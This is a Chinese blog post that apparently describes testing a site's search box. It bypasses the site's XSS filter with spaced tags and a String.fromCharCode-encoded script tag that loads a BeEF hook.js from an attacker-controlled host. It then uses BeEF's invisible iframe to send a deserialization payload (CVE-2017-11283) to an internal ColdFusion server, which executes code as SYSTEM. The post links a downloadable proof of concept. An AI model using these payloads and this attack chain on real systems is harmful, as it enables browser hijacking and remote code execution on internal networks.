美文网首页
利用XSS结合CVE-2017-11283击穿ColdFusio

利用XSS结合CVE-2017-11283击穿ColdFusio

作者: vul404 | 来源:发表于2017-10-29 18:33 被阅读0次

在对某网站进行测试的时候,发现有个搜索框。在排除存在SQL注入后进行XSS测试,这里拿比较常见的payload: <script>alert(1);</script>来测试下,从页面的显示结果来看是存在XSS检测的。那首先要解决的问题就是来绕过这个检测。

在把payload经过一些变形后(主要就是加了些空格),比如这样 < script>alert(1);< /script>,成功弹出对话框,表示绕过成功。既然存在XSS,那利用的方式就不仅限于弹框了,这里就结合著名的beef-xss框架来对内网进行一次有趣的实验。

先在kali下开启beef:

可以看到需要引用hook.js文件,在网站搜索框输入< script src="http://192.168.111.133:3000/hook.js" >< /script>后发现并没有成功,通过查看返回的页面源码发现空格以及等于号都消失了。从这里就可以看出,网站不仅存在xss检测,还会把一些特殊字符过滤掉,这也是为什么在script标签处加了空格后依然能够被正常解析运行的原因了。

既然等于号会被过滤,那就再次对payload变形(没等于号了):< script>document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 32, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 49, 57, 50, 46, 49, 54, 56, 46, 49, 49, 49, 46, 49, 51, 51, 58, 51, 48, 48, 48, 47, 104, 111, 111, 107, 46, 106, 115, 34, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62))< /script>,这次终于成功上线了。

在beef-xss框架中,可以发送很多命令给加载了hook.js文件的浏览器来运行。利用这个框架,来对一些处于外网访问不到的内网应用进行攻击有时可以达到意想不到的效果。这里选择要攻击的应用就是ColdFusion 2016 Update 3(最近修复了编号CVE-2017-11283、CVE-2017-11238这两个反序列化漏洞)。要达到攻击效果,这里就使用beef框架来创建一个隐藏的iframe,iframe的url地址所指的文件中就包含了攻击的payload。这里主要是通过XMLHttpRequest来发送一个POST请求,带上攻击的payload发送到ColdFusion的1099端口。

在beef框架中选择Create Invisible Iframe命令后填入可以访问到的URL地址,点击运行后,ColdFusion中的漏洞就被触发,可以看到notepad.exe成功运行,还是system权限。

通过以上实验可以发现,xss威力还是不容小觑,单就拿可以发送POST数据包给内网的应用来说,一些WebLogic、WebSphere、JBoss、Jenkins以及喜闻乐见的Struts2应用都是可以被攻击的,只是限于同源策略的影响,返回结果不太容易获得。

最后附上poc.html (链接: https://pan.baidu.com/s/1bptryNl 密码: 2g2p)

相关文章

  • 利用XSS结合CVE-2017-11283击穿ColdFusio

    在对某网站进行测试的时候,发现有个搜索框。在排除存在SQL注入后进行XSS测试,这里拿比较常见的payload: ...

  • 绕过XSS-Filter

    绕过XSS-Filter (1)利用<>标记 XSS-Filter通常过滤转义“<>”“ ”等字符 (2)利用HT...

  • XSS 利用

    1、xss 获取cookie 2、令目标访问自己的钓鱼网站

  • 阅读随记

    利用XSS弹出恶意警告框,代码为: alert("XSS"); XSS输入也可能是HTML代码段,如要使网页不停地...

  • 21.浅谈前端WEB安全性(二)

    (二)浅谈前端WEB安全性5.XSS防御6.XSS分类及挖掘方法 5.XSS防御 一.概述 攻击者可以利用XSS漏...

  • XSS和CSRF

    XSS XSS:跨站脚本(Cross-Site Script)攻击,利用恶意脚本注入。关键词:script 举例 ...

  • CSRF重现与防御

    CSRF介绍: 尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过...

  • 18.浅谈前端WEB安全性(一)

    (一)浅谈前端WEB安全性1.XSS攻击:跨站脚步攻击原理2.XSS利用输出的环境来构造代码(XSS的构造技巧)3...

  • XSS和CSRF

    XSS篇: XSS,(cross site scripting),跨站脚本注入,指攻击者利用一些技巧向页面注入脚本...

  • XSS盗取cookie

    XSS定义 XSS是一种比较容易出现的安全漏洞,也是web比较常见的web攻击方式。XSS是指攻击者利用网络没有对...

网友评论

      本文标题:利用XSS结合CVE-2017-11283击穿ColdFusio

      本文链接:https://www.haomeiwen.com/subject/smvypxtx.html